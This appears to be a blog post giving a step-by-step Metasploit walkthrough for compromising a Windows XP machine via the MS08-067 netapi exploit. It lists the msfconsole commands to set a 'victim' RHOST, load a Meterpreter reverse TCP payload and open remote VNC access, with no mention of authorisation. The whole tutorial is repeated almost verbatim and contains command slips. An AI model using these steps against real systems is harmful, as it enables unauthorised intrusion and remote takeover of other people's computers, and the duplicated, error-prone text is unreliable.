Q. What is Metasploit?
Metasploit is a framework which is used for the hacking of different kinds of apps, OS, web applications &web sites etc. Metasploit contains various scanners, exploits, payloads, auxiliaires, modules, vulnerability assessments etc.
Requirements:-
1. VULNERABILITY
Vulnerability is a weakness or loophole of the system through which an attacker enters into the machine.
2. EXPLOIT
Exploit is a program or code which takes the advantage of the vulnerability to break the security of system.
3. PAYLOAD
Payloads is a program which gives control of the system to a hacker.
Step 1 –
Power on your Backtrack OS.
if you use base machine then login with h Username=root and Password=toor (By Default) or if you can use in vmware workstation no need to login .
After login to this, Type “startx” for entering into GRAPHIC Mode.
Step 2 –
Now For Hacking Windows, You have to Start Metasploit Framework. So Open your terminal and type this command, msfconsole
Metasploit Framework console
Step 3 –
There is a netapi application vulnerability in Windows XP, so to use its exploit, “search for netapi”.
Step 4 –
Here we use great exploit for windows xp
Type command use exploit/windows/smb/ms08_067_netapi and press enter
Step 5-
Check all options or commands type show options
Step 6-
Now you have to set your target ip address, command set RHOST victim ip address
Step 7-
Now we need to know our system ip.
Step 8-
Set the Local Host IP by typing this command set LHOST your system ip
Step 9-
Now Set your payload, type a command set payloads windows/meterpreter/reverse_tcp
Congrats All done ! Now time to Exploit & enjoy
Type sysinfo
If you want access victim system type run vnc
Now you can see victim system popup in your OS Like this
Metasploit is a framework which is used for the hacking of different kinds of apps, OS, web applications &web sites etc. Metasploit contains various scanners, exploits, payloads, auxiliaires, modules, vulnerability assessments etc.
Requirements:-
1. VULNERABILITY
Vulnerability is a weakness or loophole of the system through which an attacker enters into the machine.
2. EXPLOIT
Exploit is a program or code which takes the advantage of the vulnerability to break the security of system.
3. PAYLOAD
Payloads is a program which gives control of the system to a hacker.
Step 1 –
Power on your Backtrack OS.
if you use base machine then login with h Username=root and Password=toor (By Default) or if you can use in vmware workstation no need to login .
After login to this, Type “startx” for entering into GRAPHIC Mode.
Step 2 –
Now For Hacking Windows, You have to Start Metasploit Framework. So Open your terminal and type this command, msfconsole
Metasploit Framework console
Step 3 –
There is a netapi application vulnerability in Windows XP, so to use its exploit, “search for netapi”.
Here we use great exploit for windows xp
Type command use exploit/windows/smb/ms08_067_netapi and press enter
Step 5-
Check all options or commands type show options
Step 6-
Now you have to set your target ip address, command set RHOST victim ip address
Step 7-
Now we need to know our system ip.
Step 8-
Set the Local Host IP by typing this command set LHOST your system ip
Step 9-
Now Set your payload, type a command set payloads windows/meterpreter/reverse_tcp
Congrats All done ! Now time to Exploit & enjoy
Type sysinfo
If you want access victim system type run vnc
Now you can see victim system popup in your OS Like this
0 comments:
Post a Comment